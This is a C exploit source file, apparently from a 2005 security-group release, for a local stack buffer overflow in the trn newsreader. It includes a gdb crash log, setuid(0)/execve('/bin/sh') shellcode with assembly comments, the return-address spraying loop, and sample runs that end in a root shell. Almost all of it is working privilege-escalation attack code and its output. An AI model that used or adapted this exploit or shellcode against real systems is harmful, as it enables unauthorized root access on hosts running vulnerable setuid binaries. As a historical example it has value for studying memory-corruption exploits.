/*
  Name: 'trn' >> trnxpl.c
  Copyright: [N]eo [S]ecurity [T]eam [NST]® - http://neosecurityteam.net/
  Author: HaCkZaTaN
  Date: 26/01/05 16:17
  Description: Local Stack Buffer Overflow
               Advisore by RootBinBash Team
               http://www.rootbinbash.com/d0kum4n/trn-test.txt
*/

/*
Test:
root@NST:/home/h4ck# gdb trn
GNU gdb 6.3
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i486-slackware-linux"...(no debugging symbols found)
Using host libthread_db library "/lib/libthread_db.so.1".

(gdb) r `perl -e 'print "A" x 128'`
Starting program: /usr/bin/trn `perl -e 'print "A" x 128'`
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r eip esp ebp
eip            0x41414141       0x41414141
esp            0xbffff208       0xbffff208
ebp            0x41414141       0x41414141
(gdb)
---------------------------------------------------
In Slackware is not setuid 0 by default but in RedHat & Mandrake they do.

h4ck@NST:~$ ./trnxpl
 Use: ./trnxpl <path>
h4ck@NST:~$ ./trnxpl /usr/bin/trn

[+] 'trn' >> trnxpl.c Local Stack Buffer Overflow (Proof of Concept)
[+] by HaCkZaTaN <hck_zatan@hotmail.com>
[+] Advisore by RootBinBash Team
[+] http://www.rootbinbash.com/d0kum4n/trn-test.txt
[+] [N]eo [S]ecurity [T]eam [NST]® - http://neosecurityteam.net/
[+] Ret: = 0xbfffffc0
[+] Shellcode : 29
[+] Waiting............
sh-3.00$ id
uid=1000(h4ck) gid=100(users) groups=100(users)
sh-3.00$ exit
*/

#include <stdio.h>
#include <strings.h>
#define BUFFER 128 + 4

char shellcode[]=
/* Shellcode by HaCkZaTaN */
// setuid(0)
"\x31\xdb"                  //xor    %ebx,%ebx ; 0
"\x53"                      //push   %ebx
"\x8d\x43\x17"              //lea    0x17(%ebx),%eax ; SYS_setuid
"\xcd\x80"                  //int    $0x80 ;kernel
//execve()
"\x99"                      //cltd
"\x68\x6e\x2f\x73\x68"      //push   $0x68732f6e 'hs/n'
"\x68\x2f\x2f\x62\x69"      //push   $0x69622f2f 'ib//'  > /bin/sh
"\x89\xe3"                  //mov    %esp,%ebx
"\x50"                      //push   %eax
"\x53"                      //push   %ebx
"\x89\xe1"                  //mov    %esp,%ecx
"\xb0\x0b"                  //mov    $0xb,%al ; SYS_Execve
"\xcd\x80";                 //int    $0x80 ;Kernel

int main(int argc, char *argv[])
{
   char *env[3] = {shellcode, NULL};
   char buf[BUFFER], *path;
   int *buffer = (int *) (buf);
   int i, ret;

   if(argc != 2) {
      printf(" Use: %s <path>\n", argv[0]);
      exit(0);
   }

   path = argv[1];

   ret = 0xbffffffa - strlen(shellcode) - strlen(path);

   for(i=0; i<=BUFFER; i+=4)
   *buffer++ = ret;

   printf("\n[+] 'trn' >> trnxpl.c Local Stack Buffer Overflow (Proof of Concept)\n");
   printf("[+] by HaCkZaTaN <hck_zatan@hotmail.com>\n");
   printf("[+] Advisore by RootBinBash Team\n");
   printf("[+] http://www.rootbinbash.com/d0kum4n/trn-test.txt\n");
   printf("[+] [N]eo [S]ecurity [T]eam [NST]® - http://neosecurityteam.net/\n");
   printf("[+] Ret: = %.8p\n", ret);
   printf("[+] Shellcode : %d\n",strlen(shellcode));
   printf("[+] Waiting............\n");

   execle(path, "trn", buf, NULL, env);
}

sh-3.00# ./x /usr/bin/trn

[+] 'trn' >> trnxpl.c Local Stack Buffer Overflow (Proof of Concept)
[+] by HaCkZaTaN <hck_zatan@hotmail.com>
[+] Advisore by RootBinBash Team
[+] http://www.rootbinbash.com/d0kum4n/trn-test.txt
[+] [N]eo [S]ecurity [T]eam [NST]® - http://neosecurityteam.net/
[+] Ret: = 0xbfffffd1
[+] Shellcode : 29
[+] Waiting............
sh-3.00# id
uid=0(root) gid=100(users) groups=100(users)
sh-3.00#